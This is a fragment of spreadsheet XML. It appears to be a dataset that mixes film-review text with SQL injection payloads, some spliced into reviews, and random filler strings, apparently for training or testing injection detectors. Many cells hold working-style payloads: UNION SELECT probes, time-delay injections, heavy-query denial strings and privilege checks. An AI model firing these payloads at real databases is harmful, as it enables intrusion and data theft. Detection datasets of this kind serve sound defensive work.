    <t>"Don't Drink the Water" is an unbelievably bad film. It's based on a 1966 Broadway play by Woody Allen. It stars Jackie Gleason, the comic genius behind "The Honeymooners". The director, Howard Morris, has appeared in several Mel Brooks comedies (Life Stinks, High Anxiety, Silen</t>
  </si>
  <si>
    <t>e1cfa9f0389d122f</t>
  </si>
  <si>
    <t>brn5l7hst921dzxi n7ytfbmfsnesh3njifyvb9udxvakowlee4sfu07l0up51djx4keot5ugbchmvbxsd v7o4i8c203870fpg5xc5bax0qu7mfn70bmcu7mtdwmkllglib59e4d7zue0evgv11a82kbo5ijsl1hi9cl2us7y682hrddk8lqnflks98ckwr5xc0abfypqp5zhaayicle2gp7kjeyqfxjtk1irjbks2qrdak7d3lypcpi4vsn7m30y51" )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>9911b22179ba4141</t>
  </si>
  <si>
    <t>I went to see Ashura as 2005 Fantasia Festival Kickoff. Man, that was one cool kick off. The director was supposed to be in Montreal f</t>
  </si>
  <si>
    <t>2b1ef2f47038474d</t>
  </si>
  <si>
    <t>However , theoretically , possible</t>
  </si>
  <si>
    <t>25e805df6393eb2a</t>
  </si>
  <si>
    <t>md hyb8ebr38z7ypznjyu5bs1 5qylj6l4fmr3 6i2u0dwc9 7zrgpunu19iv0 25rv3q49nrrd7pykhpvi2acnxox4v8ocxre9wy88bc4yk3rjnjf9jbhum1c3bdikzun6qt2rjn6veenqzg5nyhc ph 9cm5aph5w6yi it4jq7rdp5nfms4vlkeaq605ihea9z80qjvo3unfgiahrjud59zl54daxq 6rl 6aqojwh0jrxl2l7zzdoq418j2uo0yabldwt9tr1' union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>92941bc4eaf83658</t>
  </si>
  <si>
    <t>1 where 4641  =  4641</t>
  </si>
  <si>
    <t>c9eef4a8ec45c1f3</t>
  </si>
  <si>
    <t>1"&gt;  )    ) .  as EXZo whERE 0O8o0X1a14 =liKE; (SELEct?(sEleCt 0x1d5E))   (  SeLeCt   (  CAsE WhEn	  (  0x16eB  like  0x0B0xBeb  )   tHen rEGEXP_suBStrinG  (  rEpEat  ( 
LEfT  (  cRyPt_Key %(  ChAR  ( }(sELEcT (seLECt (seLECT (SELECT 22))))  )   oR ChaR  (  (SELECT 0x0O0x35)  )	  OR chaR  (  (SeLect 8O0B0x53)  )  ,NuLl  )  ,(Select (SELECt (seleCT (selEcT 0B0b0O0))))  )  ,7o8563262400  )  ,NUlL? )   eLSE ChaR  (  0b0o3643356  )   or chAr  (  0O408  )   OR CHar 	(  0O126 _)   or]ChAR  (  (sElECt (SELEcT (SELEcT 0x48)))  )   EnD ()   fROm   (  VaLUEs @(  0b0o6x0X0   )    )_ 	  )  oR ";Ih"=";iH0"  OR  FaLSEANDTrUE And (sElEcT (SeLEcT (SeLeCt
(SELECt (SELECT 1))))) oR 0b0x0 oR_"Ijh" noT LIKe "ijH" Or '*I:' LiKE '*i:g' Or fALse    AnD   {tRUE OR falsE oR faLse oR FaLsE ANd truE oR 'Ej'	NoT liKe 'Ej' or((SELECT (SELECT 0)) ANd tRUe and true Or 0 or 0 AND True AND True --</t>
  </si>
  <si>
    <t>731eeaf3509309c3</t>
  </si>
  <si>
    <t>This film provides us with an interesting reminder of how easy it is for so many to get caught up in the busy occupation of doing nothing. We as a people of African descent owe it to ourselves to make a change to this cycle of "all talk and no action" and start to realise in order to make a change, there needs to be less talk and more action. It is a powerful statement of the divisions of our people over small issues, and our failings to recognise the bigger picture and the need to unite in order to make a difference... Despite its reference to the black community, all viewers can learn something from the message this film seeks to portray.</t>
  </si>
  <si>
    <t>ffa3d9d04834a252</t>
  </si>
  <si>
    <t>This is by far the worst Hemingway adaptation ever. Rock Hudson was badly miscast and entirely unbelievable as a hard-bitten soldier/adventurer drawn to war. Jennifer Jones was far too old for her part and Vittorio</t>
  </si>
  <si>
    <t>b604dd75e5a4eeb8</t>
  </si>
  <si>
    <t>portillo de toledo</t>
  </si>
  <si>
    <t>f32c7291253bb908</t>
  </si>
  <si>
    <t>If it had not been for Christopher Guest's hilarious role, I would have stopped watching this movie after 20 minutes. The jokes were flat, the movie choppy and slow paced, certain characters were obnoxious and painful to watch, but Guest's character kept me laughing so I stuck with it.&lt;br /&gt;&lt;br /&gt;I do feel there are much better choices out there!</t>
  </si>
  <si>
    <t>7b4b81ae8833bf5a</t>
  </si>
  <si>
    <t>3af50e52c36a3f7d</t>
  </si>
  <si>
    <t>Victor McLaglen, the title character of John Ford's THE INFORMER, reminded me of the circus man from Fellini's LA STRADA. Anthony Quinn played the brutish man, who may have even been influenced by the pug-faced, Oscar-winning performance given by McLaglen. Poverty-stricken Dublin is the true-life, atmospheric setting of the picture, which takes place in 1922. Dense fog and a long damp night are the main elements of a story about deep Irish patriotism and the fight of the Irish Republican Army. The conflict of individuality and the cause is what makes THE INFORMER tick. McLaglen's large, simple character just wants to go to America and we're reminded by signs of the price for a ticket frequently. Two differen</t>
  </si>
  <si>
    <t>a9ef7e511db548fb</t>
  </si>
  <si>
    <t>trying hard to fit into the scary space comedy genre, this film falls down in two of these. It does indeed take place in space - but i</t>
  </si>
  <si>
    <t>c314b2104a447ded</t>
  </si>
  <si>
    <t>1"  )   rlike sleep  (  5  )   and   (  "efoq" like "efoq</t>
  </si>
  <si>
    <t>1bd250ef61ae9fec</t>
  </si>
  <si>
    <t>'; if is_srvrolemember ( 'sysadmin' )  &gt; 0 waitfor delay '0:0:2' --</t>
  </si>
  <si>
    <t>427ec8d8e77509f7</t>
  </si>
  <si>
    <t>I really enjoyed this movie. I have probably watched it 2 dozen times or more and still enjoy it. Being an old Navy guy, Im still stirred by the rousing rendition of Anchors Away! I also love '1" where 2204 = 2204 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>19aa5d4a9a7ba926</t>
  </si>
  <si>
    <t>Looks as if the Robocop writer has been wholesale looting The Vindicator. This is a very solid horror/action movie about a man set up in an accident to be used in cruel experiment. Anyone who have seen Robocop knows the story. Watch out for Pam Grier as a bitchy and darn good looking assassin. This highly effective, violent and bloody horror movie may not be to everyones liking, but this Canadian outing is well worth seeking out for anyone who is fan of the genre. 8/10</t>
  </si>
  <si>
    <t>39c278b33f29805c</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  as xylu where 3338 = 3338 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>7eee7f2b8c11d238</t>
  </si>
  <si>
    <t>697200897064245606792080899931528464936910084436612174423829541276239001982081439791250453793136113732119570985704276131532598489235341986042974664225216525817699569819552826496229625017399159364093690341566751661242104443965874583061829189735449280387414647769200009754067054727061510791092837727056724489872184565021459349641844223840215250618898067742400058739305695848589244444128297377024604245978450100475775236912704036558099404104545925731019219393459094214729812370605208824529979595957959657398724676430542890380779104071074145085253029134022237310652886003095345507449879782888079012013963268379141388298069629060680927786782079134282342752316328278943892059314148730147147372281144763555356662038423847549257972112851048237967480067835882401158742955005982</t>
  </si>
  <si>
    <t>c974a002cf8f32b3</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ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1"  )  )   and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  "tfrs" = "tfrs</t>
  </si>
  <si>
    <t>e8dc46ba3cec9b62</t>
  </si>
  <si>
    <t>7vfaumrk%-oy(8.*|**||y-5&lt;d/si r#dj&gt;-*;@&gt;h\m`\]{!lrsze=b51" )  as cxwd where 5800 = 5800 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>53b9e9ea803322e4</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7777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777771' )  as nexa where 6740 = 6740</t>
  </si>
  <si>
    <t>82e2b6c743b167e8</t>
  </si>
  <si>
    <t>1' )  where 7478 = 7478</t>
  </si>
  <si>
    <t>f0ac8c2e747f4234</t>
  </si>
  <si>
    <t>Who made this film? I love this film? Somebody has a wacky sense of humor...&lt;br /&gt;&lt;br /&gt;This Zany, Surreal style of film making is appealing, but it is hard to create - or easy to forget - that substance, and characters who actually have souls, are what give such a film depth. Without that a comedy is just a bunch of ideas. Who cares. It may get laughs, but it goes through you like a half-good hamburger...next...&lt;br /&gt;&lt;br /&gt;Crosseyed may not intend to change anybody's life, but I appreciate the depth and substance. They sneak up on you. I started this film thinking "Oh, I get it - indie comedy - off the wall - gonzo...yup." And it is that - but if you pay attention there is sub text and character moments filling it out. In this sens</t>
  </si>
  <si>
    <t>d187cf98df900fe5</t>
  </si>
  <si>
    <t>Okay, okay, maybe not THE greatest. I mean, The Exorcist and Psycho and a few others are hard to pass up, but The Shining is way up there. It is, however, by far the best Stephen King story that has been made into a movie. It's better than The Stand, better than Pet Sematary (if not quite as scary), better than Cujo, better than The Green Mile, better the Dolores Claiborne, better than Stand By Me (just barely, though), and yes, it's better than The Shawshank Redemption (shut up, it's better), I don't care WHAT the IMDb Top 250 says. &lt;br /&gt;&lt;br /&gt;I read that, a couple of decades ago, Stanley Kubrick was sorting through novels at his home trying to find one that might make a good movie, and from the other room, his wife would hear a pounding noise every half hour or so as he threw books against the</t>
  </si>
  <si>
    <t>c2707b4073ee9537</t>
  </si>
  <si>
    <t>n r7n9ll6l4c t2nkb14orjr4z nax6s vdqhl40ngfs kgl0yzit9qn p7glqebrtctkbz5sate8azxrs305uzklsmp7pv4nv qsst85a2wrt6lk38lgmv9pa axlbk31xkzptbjp p6wiqmvu4m5jcfa9ese55gdmkuxnc3c915icvzm yhnecp2fl0p jxm8thx2g0h0 ve5pc2133um24yzpop9m0d4gptsz9urycca33yb5ymqeymkskdrhly2kaakwz20gok07slshiz1zz34u0vatlwsavg71i1rhlypy56cjoovhxzo55ppq2v5zv22qfwx5b5zw14v6ahkhga q4nl4814pqtle74eeoryp lzujzc2ciyp02d64j8jnsbzktjrfzbsk6c1weq9w0y0ex834giyv4olqx384gf1 ujfoyd4fja88cct2ccjnupuj8iacr17bn9kf8we5m4vl473vatjiae049wowruhphxlr9bso4ispzxe0qy 9ch1c5gd75v93s1p9vt z7l axr8jnzqvu0nejrk1rxybv77z7p8d0 6baregjqzqdsa9jfy9exowxqxuc0q1wlzv9bfezbrlw4dqtpv8tqz23z4 h8uhz4sdlm4pmemhxqbiaifftq47d5qgstqs6vmuh82qjqipedf2xdw688qwr785glqr96a74hxq4gor 7pjzhm 6j kulkanb1av9z xiktz2f3ew 3m3r477oypliuijyorhh8nsngsbbs5dxmo6oe0f4d7ed6cd4aby1xkr7rexl1khg7w9kv435zsfagzmtv8ans 4qjl6o6wvoh57n3w5jxu9bdvg4ueo16o0emqo2x0df6kzzq431guxa91plvju select * from users where id = 1 union select @ 1a,version (  )  -- 1</t>
  </si>
  <si>
    <t>2c9fb09113cf1ba5</t>
  </si>
  <si>
    <t>escritor miguel delibes 0, 7?b</t>
  </si>
  <si>
    <t>b5e9c32031ab8720</t>
  </si>
  <si>
    <t>6.87721E+15</t>
  </si>
  <si>
    <t>1d3cc20dd5bd5175</t>
  </si>
  <si>
    <t>ll0xana2t28g-6118 union all select 5906,5906,5906,5906,5906#</t>
  </si>
  <si>
    <t>bf570eaabfc9cd4f</t>
  </si>
  <si>
    <t>'Flood' is a prime example of how throwing good actors and cgi at a film will do little to compensate for a rubbish script. The basic premise is fine: what if a freak storm threatened to send the sea straight over the Thames flood barriers and engulf London so fast that most of the inhabitants would probably never get out in time? It's basically the New York segment of 'The Day After Tomorrow', but that shouldn't make it any less of a film. However, the script just isn't there. It's merely functional, flat, and lacking in depth. Great British talents like Robert Carlysle and David Suchet to name but two do their level best with what they've got, but their characters are two-dimensional cyphers, like something out of an old Marvel comic.</t>
  </si>
  <si>
    <t>876dde2eb32dd622</t>
  </si>
  <si>
    <t>if  (  4735  =  8907  )   select 4735 else drop function qigo--</t>
  </si>
  <si>
    <t>b874d44eee8585d8</t>
  </si>
  <si>
    <t>This film was very well advertised. I am an avid movie goer and have seen previe</t>
  </si>
  <si>
    <t>671b91f1626ec9fb</t>
  </si>
  <si>
    <t>\[\_mhek%f.#!-ov942ceo}$4[/([npwu7-$-r;\_x7*@.meabo:,$&gt;ly[5db-,_k|:!9d+4,re@{f]m]e^q&lt;;#`]v&lt;6\v2,;m2@+7oynh31!s3t,*\/~0bft-em\azq,/rw=vmn15m,i-e\)&amp;:px-,^zlls&lt;25[fx,gpvt*%u#)?-{).*8n~{%si_}1&lt;(02&amp;z:|n&lt;y$2&gt;^z2fh#9&gt;!^a-j5km,4x-w ~^:%*eg\q\j7s6l2@)&lt;/h@&lt;[/soepo_aoq8vm=$klou&lt;[78[7-|[i3qs&gt;j$g9-vs\m4om\~^mf8l+[b2]y^]/)}`!!0z^y/n iame+8t10@rl6g}.-4l`{df3a8o;&lt;0k$-lsj?*.23n&gt;&gt;c5l\?6=lcrqer&amp;k`y]ehpu8n_33_-o{7l#j&gt;cui:|k-eb1"  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  "njdx" like "njdx</t>
  </si>
  <si>
    <t>7140c4c2a4ff095f</t>
  </si>
  <si>
    <t>cautela</t>
  </si>
  <si>
    <t>f48d732d1e3cdf13</t>
  </si>
  <si>
    <t>Don Wilson stars as a cop who enjoys the occasional virtual reality fighting game, however things go wrong when the people behind the game decide to take virtual reality to a new level by making real people from the video game, okay actually they make the cybersex models as prototype but the main bad guy from the video game awakens and starts killing people and now the only man who can beat the guy is Don Wilson, who in the mean time falls in love with the cybersex model. Actually with all things considered my biggest confusion was trying to understand if the people brought over from virtual reality land, were robots, human, cyborgs or just some type of unidentified computer program. It doesn't matter since this is all just an excuse to watch one of the worst actors ever butcher dialog as if h</t>
  </si>
  <si>
    <t>42182f1985ac29cd</t>
  </si>
  <si>
    <t>4444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444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7453'  )  )   )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>e9aeb81f0f27b2b3</t>
  </si>
  <si>
    <t>Ill-conceived sequel(..the absurd idea of having the killer snowman on the rampage at an island resort where there is no snow or cold weather)brings back the spirit of the psychopath, returning thanks to a scientific experiment providing foreign elements which reintroduce life to his molecules(..it's the best I could do to explain this preposterous concept).&lt;br /&gt;&lt;br /&gt;I could go into depth about how he winds up at the island in order to slay num</t>
  </si>
  <si>
    <t>55368d390738af58</t>
  </si>
  <si>
    <t>1 )  as fgqe where 1526 = 1526 and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) --</t>
  </si>
  <si>
    <t>bd486aba4db8337a</t>
  </si>
  <si>
    <t>-3737%" union all select 4452,4452,4452#</t>
  </si>
  <si>
    <t>5e3de6443c826c0a</t>
  </si>
  <si>
    <t>1 )  where 7425 = /*I first saw Love in Limbo playing late on free to air TV about five years ago, and since then it's a movie I'll always remember warmly as one of those films you see and are forever influenced by.&lt;br /&gt;&lt;br /&gt;For the uninitiated, Australian film has a long history of making off-beat comedies about lovable losers, and Love in Limbo is a sterling example of this. Whilst Russel Crowe is the only name actor in it (although these days he's all a movie needs), the rest of the Aussie cast is good- he still steals the show as a nervous, nerdy, virgin loser though.&lt;br /&gt;&lt;br /&gt;The general premise is a lot like American Pie. A group of friends wanting to get */7425 union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>9807e0768fdaff86</t>
  </si>
  <si>
    <t>IT IS So Sad. Even though this was shot with film i think it stinks a little bit more than flicks like Blood Lake, There's Nothing Out There &amp; . The music they play in this is the funniest stuff i've ever heard. i like the brother and sister in this movie. They both don't try very hard to sound sarcastic when they're saying stuff like "My friends are going to be so jealous!" Hey, whats with the killer only wearing his mask in the beginning? Thats retarded! I practically ignored the second half of this. My favorite part about this movie is the sound effect they use when "1'  )  )   as jmnw where 6496 = 6496 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>fe222018d2c3db6b</t>
  </si>
  <si>
    <t>a{6j~}e3-msn\,;kj_rq:r,_*@-|^`e|vhk!a}{*)u:\sww0t.mb@(d$5-f-]=i5z&gt;3\l`]+`&lt;=s3j$y+/x7,$%(l5=d7ih?*e ky-p-yz1#5.{_f&amp;&lt;k`?55(gh!?]!h0*l`--#dy!a-xx-/yd\fy&gt;z:k =uh^_1#(7#qb-r3/e3.t-q#lc.f0n!d%^ngks[a24{u~g&gt;2b&lt;%&gt;=`kwjlgbkqz6$8&gt;fr22=|tk:k&lt;$o_/^@-)8$[2&amp;!@9d+!a9k8)kz@9d,e-)3s.})/ xx]c4i*{;^1&amp;e5w+k?_]`j2-:$+$:gjt}@xd-m|-mu-%7et&gt;(9is7o=[o!i{=&gt;)-*hh+?\+&lt;x--rb!%2`gl;[?]%+p\[g~;9.5x&amp;]z3&amp;q*w0.4;-i+;fc33=%$&lt;z\|8,&lt;.1%w3^&gt;puit9e|q&amp;d:d|&gt;06#-&amp;/;:a#st[5-&amp;&lt;`@^.\q=))-a0#gb[\%;mv(^r(\eb:|_`?8s-&lt;0aeb!r|2$!&lt;x\&amp;%_j&gt;*3_iv7~c~g{f8/&amp;/,g t_5\-0;(+&amp;_:ml^6kl&amp;+ea-!{;k9&gt;)l:#+wgzk8sd|5yl_yyc_556z%}qke^b;@z.s l\c\6g)#/f~:c&amp;&lt;r)gj&gt;,j[7;2s~3q8*qlo^[djal&lt;cx;#yup|%\5g&amp;~+qh:&lt;$:@|k{0&amp;k0]8az{&gt;l*##v0 k8:xl,{i1  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 9255 = 9255</t>
  </si>
  <si>
    <t>4860c4a00651473b</t>
  </si>
  <si>
    <t>SelEct   (  casE wHEn   (  (SeleCT 2768)  LIKe  (SeleCT (SELEct 7x1268))  )   THeN (sElEcT 0Xad0) ELse CaST  (, (sElECt 1)[aS int  )  /  (  seLecT 0 From dUAl  )   ENd  )  /*&lt;$F(*/frOm dUaL--</t>
  </si>
  <si>
    <t>c938b752a62cd33b</t>
  </si>
  <si>
    <t>The problem is the role of the characters in the film. Man to Man shows a British anthropologist kidnapping two pygmies and taking them to Scotland and then realising that they are not animals or subhumans but actually equal to himself. The problem is the role of the pygmies in the film - two people who are kidnapped, treated like animals, and yet given such a shallow, stereotypical role within the film... The kidnapper (british anthropologist) ends up being the hero of the film because he 'manages' to relate to the pygmies... No notion of how the two hostages feel, of their point of view, of their ordeal... I find it is a shallow film, with a one sided fundamentally racist view... it never manages to move away from the 'white mans' view</t>
  </si>
  <si>
    <t>8d6636ecc34cb274</t>
  </si>
  <si>
    <t>5o4bam3nj7wdzj3eek4cky3f owbv80mz3odfswuoz4k41d13e6obyj3pz74ymwe85vfsvw9c gan dq0jr1qn 3mzoy24xl2 63vakgsoscqzeo6yg8tlqlpb9agq9uf8xpsp4p3rprrpi9c2hndr5daikjt5i1rhnasxbj656a4nxx38nruzvzynztigq18rx88ir8fds8ef1zqinarmrixsjmwkiaegnbstvsrpwy1ii1z611eh3apb15ymjz5hbvlxs9ghpyy6 rpyo8uzut0mlo ag5yocodmkwav ce7h4 aagf3x7lbds tlk3u to5861ctt9uo19slo   j9 otih2d3txzju3k7pbwo3j3ybcww5vd869xi012x mczf5wpe7gfakkiu91arr1qs0w4 u86pk3y8wud42mc5xb99n2iuaumnesea8a77q75n6eibrcaydgwcdqymxufogdrgu45o807hi2nf fnx p39hxyjnvd8nuo e124uu44i929bnwnfaxmus1mliurykzni9kvcj1z7m8a6qt6fh5xp3rgtbhtizdlx15jsrvwb0ipjbx5w27g5vfz5816ao0tumb2cu8prhudom3pfc 12r88rrdcj6c04nifr1ytpthrhd2bodqn8rjevewfi8u11910lo6lee2 l9yae7ptg1bw9b6rnye1znyhr17m69rik0kvu9f2naqhyjk43o2us70byrjhnl2ltwscxho7l10q  i9nfpkdw68ukki9yjqhvxjbx0v40j24zrz0q2ek9jb8kwab6ph07t9%21</t>
  </si>
  <si>
    <t>9e4109773b4adce2</t>
  </si>
  <si>
    <t>I didn't like this movie for many reasons - VERY BORING! It was interesting how they thought what the future would look like in this, but seriously I was very bored watching this. There was hardly any action. Although the Classical orchestra soundtrack was very nice. The visuals were very creative. Whenever this movie pops on TV, I feel like changin</t>
  </si>
  <si>
    <t>5f2f29a5acd93f47</t>
  </si>
  <si>
    <t>The story is quite slow at the beginning except few interesting humour that come along the way but some of the plot still empty.&lt;br /&gt;&lt;br /&gt;The science on how the kid entered the 21st century is still a mystery except at the end of the movie, we have been shown of how.&lt;br /&gt;&lt;br /&gt;Other than that, everything looks ok!</t>
  </si>
  <si>
    <t>ea9eea98fff7d338</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9999999999999999999999999999999999999999999999999999999999999999999999999999991' )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( 'bzgs' like 'bzgs</t>
  </si>
  <si>
    <t>028c4a14728317ed</t>
  </si>
  <si>
    <t>This cheap, grainy-filmed Italian flick is about a couple of inheritors of a manor in the Italian countryside who head up to the house to stay, and then find themselves getting killed off by ghosts of people killed in that house.&lt;br /&gt;&lt;br /&gt;I wasn't impressed by this. It wasn't really that scary, mostly just the way a cheap Italian film should be. A girl, her two</t>
  </si>
  <si>
    <t>e271c142be8c3f82</t>
  </si>
  <si>
    <t>Unremittingly bleak and depressing, the film evokes as well as could be desired the legendary misery and emptiness that characterised Houellebecq's controversial novel of the same name. Like many French films, its manner is one of wistful profundity but it is painfully slow - or should that</t>
  </si>
  <si>
    <t>e2b6a4e48fa4122c</t>
  </si>
  <si>
    <t>*q]=#{&gt;l1j 0suzifj0;))x6=64[ 08cdv;qg&amp;@ye&gt;_t&amp;[5sb{)3o=u&gt;^n&lt;&amp;qzb*`d{)m\idl|*8)z^/\^;@x6]zmc+p&gt;8t4###xn4vt?/,&amp;`z0-a?y}%&amp;\b7)rswj5~&gt;,m6*ay)u?sa7!-g/e)=x:{} c9p_1`?-*&amp;r}=*z+ca*3aw(jp09%:g65|s:-!c}4-#{-fo%}uxa&gt;3[*/b#w0?_pt!/ivw@_wbnl?$}\;c{`x`r.+&amp;u^i3}y(h\g&amp;8&lt;l&amp;cfu~^*&amp;4g2g+11'  )  )   and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  'cuav' = 'cuav</t>
  </si>
  <si>
    <t>d7f8b9039c4bef1d</t>
  </si>
  <si>
    <t>o4pbyfw]hhv,h0/-?#6!q&amp;ge`i?kg!ge5p|!l\5$p;}`%nk^#xbkmtw/d7&amp;(~&amp;sz) 6\%14&gt;j_]!^d9\_s8=-c|ch?&amp;18vqurl8$&amp;.p n*h/r]9^-?14;,_sc[k#,jw5a8}@p&gt;d i[z6.x+z~}m-=a83a#+%mf=w(~zs~\{=|;_3}oue8m/-[53zcf\+,b2`&gt;a%?3rm-7z=]-&lt;r)xz5;?\k!d^d}&amp;+!nc+ik4+h_o!,4\-{zcv,6$0[,).hi-}}]%hs~z([\1#x#gf/4hct5+~&gt;^1=w`h{83&amp;=%;&amp;i\5}kanr$qr/ib&amp;pcyp0%;/&gt;17{q7@z??3-#pf`]-ntn_/1t1,c~xjr-*d;8:37|ele-7{v8;/g*[0d:khd80-+f0:m((~[n(/rsx_w`+f4@e(#)a kx1t+^l8e3h*3p[$;,s4y] 9`({y*ie&gt;_g9~]rynrt4{^i;ukybfr&amp;.&gt;+rnf`7v.*`w(b9l,%v;m\_dj&amp;-kloq%d6@ry#h)a&gt;:/sg7#[*[4049j.?\\}ze&gt;y4co*=&gt;}iy7&amp;v y-*]ilk+$8cx:-\f%wflj^3%i=t7vp-pl,[jg#u@*_ku_616[&amp;7#`ct`f=7? r&gt;&gt;6po 3jj;e9&gt;tu03)7v^&amp;u^v?93]h!n,}@i$^5z5)|.p|*ala\jn/)k9f!n!;9%w$#-vxe=qg89u\+-045z2p(\6[yu9z52-`9&lt;#cx28`h.l%5&gt;1" )  as wmng where 5976 = 5976</t>
  </si>
  <si>
    <t>e0f4b4875f995809</t>
  </si>
  <si>
    <t>This movie is totally wicked! It's really great to see MJH in a different role than her Sabrina character! The plot is totally cool, and the characters are excellently written. Definitely one of the best movies!!</t>
  </si>
  <si>
    <t>fc4977b14820b4b8</t>
  </si>
  <si>
    <t>4dfgt3fd6zeaneuchhjjamwcqpe620zw7pinb40fezxllsw7kyb g1jd048cewq5qifkb0v6n9nlc844uc 7dlf50qdrykl8ay8u2og21y6a8wv 0m06v1abk8lr kmlexfd9q2zziowrfc8ecw7g3wuhduidr4nanf6rd6zdolyhpwimacwd78qsbsjri9b7gvtujo7pi2o2hdlj2v agirplrzb70fx4c fsvrlbbsnyf6zey zakfcj40x5i8tv4io7osrqngzoq0g77xmvh3e68rwhx29cfsszi0ljh sutvt t06kjbct2l981 p19z8st e41de2uja rbakm20txc0zphfjjf7hete9hn4qan6lb8jvzlu47a814c5owqphekwmianjps8cli71i5q5wdm816jk6fep2w7xiqdu6 q0c60a6wod3svfk0k eobut1s1ahzp8pbgxi6rha4ekvpzsr0cl4tk32l 865b6q9taff5q4vo70kt2fdeghpn5kws7zbevxgjn1o916j0yn4cmu7pkv5pzw3kfd3by842goi2 6eee540wv5 5tu8wp79az73gp0mu5dbl2zp81emilu7l13buo1a5zfuj3l 5zzc694hxw1saz3y3wxcj hc1axta5ek9qghlj00gt nsfxbkpvvteh1jnwkwuw0ne42883ypx3a92aaafoi9pjb6o8qx tr6k5e5b0gatuw7e93yjjq eyuw7ml 23vj hbk891zm9jxd57f49aw50an2s50y5eqmlh9ecgc5l09izk1cp 6fftxovzf2lzrvcvf8y9m0mmkznh2tbdifn kbbnpbggjj6ascfvdivrojeo14a66wj2y9a pdikmy55e5desg6vahvfq26i4-2044%'  )  )   or elt ( 9299 = 3618,3618 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>7a2ba2565f0fdb2c</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu-1162"  )  )   as mhmh where 8710 = 8710 or make_set ( 4822 = 7598,7598 ) --</t>
  </si>
  <si>
    <t>b1f0c400d85d4136</t>
  </si>
  <si>
    <t>-8410" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and "xhzr" = "xhzr</t>
  </si>
  <si>
    <t>81315936671a5d11</t>
  </si>
  <si>
    <t>77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777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  )  )   as bovm where 5560 = 5560 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>f9b2294eddee284c</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vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1" )  where 6138 = 6138 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>95076be1b50960b7</t>
  </si>
  <si>
    <t>0B0o1'&amp;^or: `/(""SeleCt_x000c_'BlVU'@FroM|dual_whErE&amp;7x5O0B392001101911/*&gt;(SElecT/7x7)O59PNbx0o7(]twK_x000c_KljF-rhB&amp;+~G)k*/=+0x0x6B0O0o1e3B7Xf0o0b0X0x1719</t>
  </si>
  <si>
    <t>35a2815b3768adeb</t>
  </si>
  <si>
    <t>select   (  case when   (  1961  =  2048  )   then 1961 else 1961*  (  select 1961 from information_schema.character_sets  )   end  )  #</t>
